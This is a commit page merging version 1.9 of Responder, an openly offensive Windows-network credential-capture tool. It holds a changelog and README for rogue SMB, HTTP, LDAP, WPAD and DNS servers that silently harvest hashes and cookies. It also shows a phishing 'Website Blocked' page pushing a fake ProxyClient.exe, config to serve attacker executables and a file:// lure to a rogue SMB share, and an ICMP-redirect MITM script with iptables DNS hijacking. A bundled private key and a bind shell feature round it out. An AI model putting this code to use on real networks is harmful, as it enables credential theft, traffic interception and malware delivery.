Commit dac27f69 authored by Mati's avatar Mati

Merge tag 'upstream/1.9'

Upstream version 1.9
parents a4e13c5d 6871b5e0
ChangeLog from 0.6 to 1.9:
ChangeLog Responder 1.9:
- Added: Ability to change the HTML payload returned after authentication. See Responder.conf
- Added: Ability to change the pac script in Responder.conf
- Added: Configuration file for Responder. See Responder.conf
- Removed: Several options removed.
- Added: Bind shell which when executed on a victim workstation, will bind cmd.exe to port 140.
- Added: -e, --exe, --file option for serving specific files via the HTTP and WPAD server.
- Added: Ability to bind Responder to a specific interface
- Fix: Several fixes
- Added: HTTPS module.
- Added: Support for LM Hash downgrade.
- Added: WPAD transparent proxy server.
- Fix: minor bug fix
- Fix: Fixed bug in HTTP server.
- Added: Rogue LDAP auth server. Supports clear text password and NTLMSSP.
- Added: Ability to turn on/off the DNS server.
- Added: Icmp-Redirect.py for MITM Windows =< 5.2 Domain members.
- Added: Icmp-Redirect.py for MITM Windows XP/2003 and earlier Domain members.
- Added: SMB Clear Text function for NT4 specific.
- Added: DNS server module.
- Added: FTP server module.
......
#!/bin/bash
openssl genrsa -des3 -out responder.tmp.key 2048&&openssl rsa -in responder.tmp.key -out responder.key&&openssl req -new -key responder.key -out responder.csr&&openssl x509 -req -days 365 -in responder.csr -signkey responder.key -out responder.crt&&rm responder.tmp.key responder.csr
-----BEGIN CERTIFICATE-----
MIIDBjCCAe4CCQDDe8Sb2PGjITANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
cyBQdHkgTHRkMB4XDTEzMDIyODIwMTcxN1oXDTE0MDIyODIwMTcxN1owRTELMAkG
A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMQB5yErm0Sg7sRQbLgbi/hG/8uF2xUzvVKnT4LROEWkkimy9umb2JbvAZITDvSs
r2xsPA4VoxFjKpWLOv7mAIMBR95NDWsTLuR36Sho/U2LlTlUBdSfQP7rlKQZ0L43
YpXswdvCCJ0wP2yOhq0i71cg/Nk9mfQxftpgGUxoa+6ljU9hSdmThu2FVgAbSpNl
D86rk4K9/sGYAY4btMqaMzC7JIKZp07FHL32oM01cKbRoNg2eUuQmoVjca1pkmbO
Y8qnl7ajOjsiAPQnt/2TMJlRsdoU1fSx76Grgkm8D4gX/pBUqELdpvHtnm/9imPl
qNGL5LaW8ARgG16U0mRhutkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAS7u4LWc9
wDPThD0o58Ti2GgIs+mMRx5hPaxWHJNCu+lwFqjvWmsNFfHoSzlIkIUjtlV2G/wE
FxDSPlc/V+r7U2UiE7WSqQiWdmfOYS2m03x4SN0Vzf/n9DeApyPo2GsXGrha20eN
s390Xwj6yKFdprUPJ8ezlEVRrAMv7tu1cOLzqmkocYKnPgXDdQxiiGisp7/hEUCQ
B7HvNCMPbOi+M7O/CXbfgnTD029KkyiR2LEtj4QC5Ytp/pj0UyyoIeCK57CTB3Jt
X3CZ+DiphTpOca4iENH55m6atk+WHYwg3ClYiONQDdIgKVT3BK0ITjyFWZeTneVu
1eVgF/UkX9fqJg==
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxAHnISubRKDuxFBsuBuL+Eb/y4XbFTO9UqdPgtE4RaSSKbL2
6ZvYlu8BkhMO9KyvbGw8DhWjEWMqlYs6/uYAgwFH3k0NaxMu5HfpKGj9TYuVOVQF
1J9A/uuUpBnQvjdilezB28IInTA/bI6GrSLvVyD82T2Z9DF+2mAZTGhr7qWNT2FJ
2ZOG7YVWABtKk2UPzquTgr3+wZgBjhu0ypozMLskgpmnTsUcvfagzTVwptGg2DZ5
S5CahWNxrWmSZs5jyqeXtqM6OyIA9Ce3/ZMwmVGx2hTV9LHvoauCSbwPiBf+kFSo
Qt2m8e2eb/2KY+Wo0YvktpbwBGAbXpTSZGG62QIDAQABAoIBABbuLg74XgLKXQSE
cCOdvWM/Ux+JOlchpW1s+2VPeqjTFvJf6Hjt7YnCzkk7h41iQmeJxgDT0S7wjgPO
tQkq+TZaSQEdvIshRGQgDxvWJIQU51E8ni4Ar4bjIpGMH5qROixV9VvzODTDdzgI
+IJ6ystDpbD4fvFNdQyxH2SL9syFRyWyxY3vWB0C/OHWxGFtiTtmeivBSmpxl0RY
RQqPLxX+xUCie7U6ud3e37FO7cKt+YT8lWKhGHKJlTlJbHs1d8crzp6qKJLl+ibB
0fB6D6E5M1fnIJFJULIYAG5bEak90KuKOKCLoKLG+rq0vUvJsb9vNCAA6rh1ra+n
8woY8TECgYEA7CEE/3oWnziB3PZoIIJDgbBalCCbA+/SgDiSvYJELEApCMj8HYc5
UGOxrfVhPmbHRUI982Fj1oM3QBEX0zpkOk7Xk224RXwBHG8MMPQmTMVp+o06AI6D
Nggyam9v5KLNMj5KghKJSOD0tR5YxsZPXw4gAI+wpqu3bXGKZ8bRpvUCgYEA1ICJ
H+kw6H8edJHGdNH+X6RR0DIbS11XQvbKQ3vh6LdHTofoHqQa3t0zGYCgksKJbtHV
2h3pv+nuOu5FEP2rrGJIforv2zwfJ5vp65jePrSXU+Up4pMHbP1Rm91ApcKNA15U
q3SaclqTjmiqvaeSKc4TDjdb/rUaIhyIgbg97dUCgYAcdq5/jVwEvW8KD7nlkU5J
59RDXtrQ0qvxQOCPb5CANQu9P10EwjQqeJoGejnKp+EFfEKzf93lEdQrKORSVguW
68IYx3UbCyOnJcu2avfi8TkhNrzzLDqs3LgXFG/Mg8NwdwnMPCfIXTWiT5IsA+O1
daJt7uRAcxqdWr5wXAsRsQKBgFXU4Q4hm16dUcjVxKoU08D/1wfX5UxolEF4+zOM
yy+7L7MZk/kkYbIY+HXZjYIZz3cSjGVAZdTdgRsOeJknTPsg65UpOz57Jz5RbId7
xHDhcqoxSty4dGxiWV8yW9VYIqr0pBBo1aVQzn7b6fMWxyPZl7rLQ3462iZjDgQP
TfxNAoGBAK/Gef6MgchbFPikOVEX9qB/wt4sS3V7mT6QkqMZZgSkegDLBFVRJX3w
Emx/V2A14p0uHPzn5irURyJ6daZCN4amPAWYQnkiXG8saiBwtfs23A1q7kxnPR+b
KJfb+nDlhU1iYa/7nf4PaR/i9l6gcwOeh1ThK1nq4VvwTaTZKSRh
-----END RSA PRIVATE KEY-----
<html>
<head>
<title>Website Blocked: ISA Proxy Server</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>
</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>New Security Policy: Website Blocked</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="http://isaProxysrv/ProxyClient.exe"><b>Proxy Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Proxy Server</b></div>
</center>
</body>
</html>
File added
......@@ -56,9 +56,13 @@ class IIS_Auth_Granted(Packet):
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload", "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
#HTTP NTLM Auth
class NTLM_Challenge(Packet):
......
......@@ -49,6 +49,69 @@ class WPADScript(Packet):
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class ServerExeFile(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ContentType", "Content-Type: application/octet-stream\r\n"),
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
("Connection", "Connection: keep-alive\r\n"),
("X-CCC", "US\r\n"),
("X-CID", "2\r\n"),
("CRLF", "\r\n"),
("Payload", "jj"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class ServeAlwaysExeFile(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ContentType", "Content-Type: application/octet-stream\r\n"),
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentDisp", "Content-Disposition: attachment; filename="),
("ContentDiFile", ""),
("FileCRLF", ";\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
("Connection", "Connection: keep-alive\r\n"),
("X-CCC", "US\r\n"),
("X-CID", "2\r\n"),
("CRLF", "\r\n"),
("Payload", "jj"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class ServeAlwaysNormalFile(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ContentType", "Content-Type: text/html\r\n"),
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
("Connection", "Connection: keep-alive\r\n"),
("X-CCC", "US\r\n"),
("X-CID", "2\r\n"),
("CRLF", "\r\n"),
("Payload", "jj"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
#HTTP Packet used for further NTLM auth.
class IIS_Auth_407_Ans(Packet):
fields = OrderedDict([
......
......@@ -15,10 +15,13 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys,socket,struct,optparse,random
import sys,socket,struct,optparse,random,pipes
from socket import *
from odict import OrderedDict
from random import randrange
from time import sleep
from subprocess import call
from pipes import quote
parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
prog=sys.argv[0],
......@@ -31,6 +34,8 @@ parser.add_option('-t', '--target',action="store", help="The ip address of the t
parser.add_option('-r', '--route',action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost")
parser.add_option('-s', '--secondaryroute',action="store", help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost2")
parser.add_option('-I', '--interface',action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
parser.add_option('-a', '--alternate',action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr")
......@@ -71,6 +76,7 @@ OriginalGwAddr = options.OriginalGwAddr
AlternateGwAddr = options.AlternateGwAddr
VictimIP = options.VictimIP
ToThisHost = options.ToThisHost
ToThisHost2 = options.ToThisHost2
Interface = options.Interface
def Show_Help(ExtraHelpData):
......@@ -80,8 +86,6 @@ def Show_Help(ExtraHelpData):
MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
Show_Help(MoreHelp)
class Packet():
fields = OrderedDict([
("data", ""),
......@@ -218,7 +222,7 @@ def ReceiveArpFrame(DstAddr):
print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
exit(1)
def IcmpRedirectSock():
def IcmpRedirectSock(DestinationIP):
PrintMac,DestMac = ReceiveArpFrame(VictimIP)
print '[ARP]Target Mac address is :',PrintMac
PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
......@@ -227,7 +231,7 @@ def IcmpRedirectSock():
Protocol = 0x0800
s.bind((Interface, Protocol))
Eth = Eth2(DstMac=DestMac,SrcMac=RouterMac)
IPPackUDP = IPPacket(Cmd="\x11",SrcIP=VictimIP,DestIP=ToThisHost,TTL="\x40",Data=str(DummyUDP()))
IPPackUDP = IPPacket(Cmd="\x11",SrcIP=VictimIP,DestIP=DestinationIP,TTL="\x40",Data=str(DummyUDP()))
IPPackUDP.calculate()
ICMPPack = ICMPRedir(GwAddr=AlternateGwAddr,Data=str(IPPackUDP))
ICMPPack.calculate()
......@@ -235,6 +239,29 @@ def IcmpRedirectSock():
IPPack.calculate()
final = str(Eth)+str(IPPack)
s.send(final)
print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,ToThisHost)
print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)
def FindWhatToDo(ToThisHost2):
if ToThisHost2 != None:
Show_Help('Hit CRTL-C to kill this script')
RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
if ToThisHost2 == None:
Show_Help(MoreHelp)
IcmpRedirectSock(DestinationIP=ToThisHost)
exit()
def RunThisInLoop(host, host2, ip):
dns1 = pipes.quote(host)
dns2 = pipes.quote(host2)
ouripadd = pipes.quote(ip)
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers."
while True:
IcmpRedirectSock(DestinationIP=dns1)
IcmpRedirectSock(DestinationIP=dns2)
print "[+]Repoisoning the target in 8 minutes..."
sleep(480)
FindWhatToDo(ToThisHost2)
IcmpRedirectSock()
......@@ -11,43 +11,57 @@ suffix (see: http://support.microsoft.com/kb/163409). By default, the
tool will only answers to File Server Service request, which is for SMB.
The concept behind this, is to target our answers, and be stealthier on
the network. This also helps to ensure that we don't break legitimate
NBT-NS behavior.
You can set the -r option to 1 via command line if you want this tool to
answer to the Workstation Service request name suffix.
NBT-NS behavior. You can set the -r option to "On" via command line if
you want this tool to answer to the Workstation Service request name
suffix.
FEATURES
========
- Built-in SMB Auth server.
Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP. Successfully tested from NT4
to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4.
This functionality is enabled by default when the tool is launched.
Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default.
Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion.
Clear text password is supported for NT4, and LM hashing downgrade when the
--lm option is set to On. This functionality is enabled by default when the
tool is launched.
- Built-in MSSQL Auth server.
In order to redirect SQL Authentication to this tool, you will need to
set the option -r to 1(NBT-NS queries for SQL Server lookup are
using the Workstation Service name suffix) for systems older than
windows Vista (LLMNR will be used for Vista and higher). This server
supports NTLMv1, LMv2 hashes. This functionality was successfully tested
on Windows SQL Server 2005 & 2008.
set the option -r to On(NBT-NS queries for SQL Server lookup are using
the Workstation Service name suffix) for systems older than windows
Vista (LLMNR will be used for Vista and higher). This server supports
NTLMv1, LMv2 hashes. This functionality was successfully tested on
Windows SQL Server 2005 & 2008.
- Built-in HTTP Auth server.
In order to redirect HTTP Authentication to this tool, you will need
to set the option -r to 1 for Windows version older than Vista (NBT-NS
to set the option -r to On for Windows version older than Vista (NBT-NS
queries for HTTP server lookup are sent using the Workstation Service
name suffix). For Vista and higher, LLMNR will be used. This server
supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server
was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.
Note: This module also works for WebDav NTLM authentication issued from
Windows WebDav clients (WebClient).
Windows WebDav clients (WebClient). You can now send your custom files to a victim.
- Built-in HTTPS Auth server.
In order to redirect HTTPS Authentication to this tool, you will need
 to set the -r option to On for Windows versions older than Vista (NBT-NS
 queries for HTTP server lookups are sent using the Workstation Service
 name suffix). For Vista and higher, LLMNR will be used. This server
 supports NTLMv1, NTLMv2, *and* Basic Authentication. This server
 was successfully tested on IE 6 to IE 10, Firefox, Chrome, and Safari.
 The folder Cert/ was added and contain 2 default keys, including a dummy
 private key. This is *intentional*, the purpose is to have Responder
 working out of the box. A script was added in case you need to generate
 your own self signed key pair.
- Built-in LDAP Auth server.
In order to redirect LDAP Authentication to this tool, you will need
to set the option -r to 1 for Windows version older than Vista (NBT-NS
to set the option -r to On for Windows version older than Vista (NBT-NS
queries for HTTP server lookup are sent using the Workstation Service
name suffix). For Vista and higher, LLMNR will be used. This server
supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server
was successfully tested on Windows Support tool "ldp" and LdapAdmin.
supports NTLMSSP hashes and Simple Authentication (clear text authentication).
This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.
- Built-in FTP Auth server.
This module will collect FTP clear text credentials.
......@@ -62,19 +76,24 @@ FEATURES
- Responder will logs all its activity to a file Responder-Session.log.
- When the option -f is set to "On", Responder will fingerprint every host who issued an LLMNR/NBT-NS query.
All capture modules still work while in fingerprint mode.
- When the option -f is set to "On", Responder will fingerprint every host who issued
an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode.
- Browser Listener finds the PDC in stealth mode.
- Icmp Redirect for MITM on Windows =< 5.2 Domain members. This attack combined with the DNS module is pretty effective.
- Icmp Redirect for MITM on Windows XP/2003 and earlier Domain members. This attack combined with
the DNS module is pretty effective.
- WPAD rogue transparent proxy server. This module will *silently* grab the encrypted credentials of anyone launching Internet Explorer on the network. It will also grab the cookie of the requested page. This module is higly effective.
- WPAD rogue transparent proxy server. This module will *silently* grab the encrypted
credentials of anyone launching Internet Explorer on the network. It will also grab
the cookie of the requested page. This module is higly effective. You can now send your custom Pac script to a victim. See Responder.conf.
- Responder is now using a configuration file. See Responder.conf.
CONSIDERATIONS
==============
- This tool listen on several port: UDP 137, UDP 138, UDP 53, TCP 1433, TCP 389,
- This tool listen on several port: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433,
TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141 Multicast UDP 5553.
If you run Samba on your system, stop smbd and nmbd and all other
services listening on these ports.
......@@ -82,21 +101,24 @@ CONSIDERATIONS
Edit this file /etc/NetworkManager/NetworkManager.conf and comment the line : "dns=dnsmasq".
Then kill dnsmasq with this command (as root): killall dnsmasq -9
- Any rogue server can be turn off via command line, see USAGE section.
- Any rogue server can be turn off in Responder.conf.
- Please set a valid network interface in Responder.conf. Default is eth0.
- This tool will *not* work on Windows by default.
- This tool will *not* work on Windows.
USAGE
=====
First of all, please take a look at Responder.conf and set it for your needs.
Running this tool:
- python Responder.py [options]
Usage Example:
python Responder.py -i 10.20.30.40 -b 1 -r 0 -f On
python Responder.py -i 10.20.30.40 -b On -r On
Options List:
......@@ -105,53 +127,30 @@ Options List:
-i 10.20.30.40, --ip=10.20.30.40 The ip address to redirect the traffic to.
(usually yours)
-b 0, --basic=0 Set this to 1 if you want to return a
Basic HTTP authentication. 0 will return
-b Off, --basic=Off Set this to On if you want to return a
Basic HTTP authentication. Off will return
an NTLM authentication.
-s Off, --http=Off Set this to On or Off to start/stop the
HTTP server. Default value is On.
-S Off, --smb=Off Set this to On or Off to start/stop the
SMB server. Default value is On.
-q Off, --sql=Off Set this to On or Off to start/stop the
SQL server. Default value is On.
-r 0, --wredir=0 Set this to enable answers for netbios
-r Off, --wredir=Off Set this to On to enable answers for netbios
wredir suffix queries. Answering to wredir
will likely break stuff on the network
(like classics 'nbns spoofer' will).
Default value is therefore set to Off (0).
-c 1122334455667788, --challenge= The server challenge to set for NTLM
authentication. If not set, then defaults
to 1122334455667788, the most common
challenge for existing Rainbow Tables.
-l file.log, --logfile=filename.log Log file to use for Responder session.
Default value is therefore set to Off.
-f Off, --fingerprint=Off This option allows you to fingerprint a
host that issued an NBT-NS or LLMNR query.
-F On, --ftp=On Set this to On or Off to start/stop the FTP server.
Default value is On
-L On, --ldap=On Set this to On or Off to start/stop the LDAP server.
Default value is On
-D On, --dns=On Set this to On or Off to start/stop the DNS server.
Default value is On
-w On, --wpad=On Set this to On or Off to start/stop the WPAD rogue
proxy server. Default value is On
--lm=Off Set this to On if you want to force LM hashing
downgrade for Windows XP/2003 and earlier. Default value is Off
For more information read these posts:
http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html
http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html
Follow our latest updates on twitter:
https://twitter.com/PythonResponder
......
[Responder Core]
;;
;Set these values to On or Off, so you can control which rogue authentication server is turned on.
SQL = On
SMB = On
FTP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
;
;Set a custom challenge
Challenge = 1122334455667788
;
;Set a network interface if you want to bind responder to a specific network interface.
;Default is eth0, which means Responder will listen on eth0 interfaces.
Bind_to = eth0
;
;Set this to change the default logging file
SessionLog = Responder-Session.log
;
;Set this options with your in-scope targets. Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
RespondTo =
;
[HTTP Server]
;;
;Set this to On if you want to always serve a specific file to the victim.
Serve-Always = Off
;
;Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
Serve-Exe = Off
;
;Uncomment and specify a custom file to serve, the file must exist.
Filename = Denied.html
;
;Specify a custom executable file to serve, the file must exist.
ExecFilename = FixInternet.exe
;
;Set your custom PAC script
WPADScript = function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';}
;
;HTML answer to serve after user authentication.
;In this example, we redirect the browser to our rogue SMB server.
HTMLToServe = <html><head></head><body><img src='file:\\\\\shar\smileyd.ico' alt='Loading' height='1' width='2'></body></html>
;
[HTTPS Server]
;
;Change to use your certs
cert = Certs/responder.crt
key = Certs/responder.key
;
This diff is collapsed.
......@@ -75,6 +75,39 @@ class SMBHeader(Packet):
("mid", "\x00\x00"),
])
##################################################################################
#SMB Negotiate Answer LM packet.
class SMBNegoAnsLM(Packet):
fields = OrderedDict([
("Wordcount", "\x11"),
("Dialect", ""),
("Securitymode", "\x03"),
("MaxMpx", "\x32\x00"),
("MaxVc", "\x01\x00"),
("Maxbuffsize", "\x04\x41\x00\x00"),
("Maxrawbuff", "\x00\x00\x01\x00"),
("Sessionkey", "\x00\x00\x00\x00"),
("Capabilities", "\xfc\x3e\x01\x00"),
("Systemtime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
("Srvtimezone", "\x2c\x01"),
("Keylength", "\x08"),
("Bcc", "\x10\x00"),
("Key", ""),
("Domain", "SMB"),
("DomainNull", "\x00\x00"),
("Server", "SMB-TOOLKIT"),
("ServerNull", "\x00\x00"),
])
def calculate(self):
##Convert first..
self.fields["Domain"] = self.fields["Domain"].encode('utf-16le')
self.fields["Server"] = self.fields["Server"].encode('utf-16le')
##Then calculate.
CompleteBCCLen = str(self.fields["Key"])+str(self.fields["Domain"])+str(self.fields["DomainNull"])+str(self.fields["Server"])+str(self.fields["ServerNull"])
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
self.fields["Keylength"] = struct.pack("<h",len(self.fields["Key"]))[0]
##################################################################################
#SMB Negotiate Answer LM packet.
class SMBNegoAns(Packet):
fields = OrderedDict([
("Wordcount", "\x11"),
......@@ -322,9 +355,44 @@ class SMBTreeData(Packet):
def calculate(self):
#Complete Packet Len
CompletePacket= str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["OptionalSupport"])+str(self.fields["MaxShareAccessRight"])+str(self.fields["GuestShareAccessRight"])+str(self.fields["Bcc"])+str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
## AndXOffset
self.fields["Andxoffset"] = struct.pack("<H", len(CompletePacket)+32)
## BCC Len Calc
BccLen= str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
self.fields["Bcc"] = struct.pack("<H", len(BccLen))
# SMB Session/Tree Answer.
class SMBSessTreeAns(Packet):
fields = OrderedDict([
("Wordcount", "\x03"),
("Command", "\x75"),
("Reserved", "\x00"),
("AndXoffset", "\x4e\x00"),
("Action", "\x01\x00"),
("Bcc", "\x25\x00"),
("NativeOs", "Windows 5.1"),
("NativeOsNull", "\x00"),
("NativeLan", "Windows 2000 LAN Manager"),
("NativeLanNull", "\x00"),
("WordcountTree", "\x03"),
("AndXCommand", "\xff"),
("Reserved1", "\x00"),
("AndxOffset", "\x00\x00"),
("OptionalSupport", "\x01\x00"),
("Bcc2", "\x08\x00"),
("Service", "A:"),
("ServiceNull", "\x00"),
("FileSystem", "NTFS"),
("FileSystemNull", "\x00"),
])
def calculate(self):
##AndxOffset
CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["Command"])+str(self.fields["Reserved"])+str(self.fields["AndXoffset"])+str(self.fields["Action"])+str(self.fields["Bcc"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
self.fields["AndXoffset"] = struct.pack("<i", len(CalculateCompletePacket)+32)[:2]
##BCC 1 and 2
CompleteBCCLen = str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
CompleteBCC2Len = str(self.fields["Service"])+str(self.fields["ServiceNull"])+str(self.fields["FileSystem"])+str(self.fields["FileSystemNull"])
self.fields["Bcc2"] = struct.pack("<h",len(CompleteBCC2Len))
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment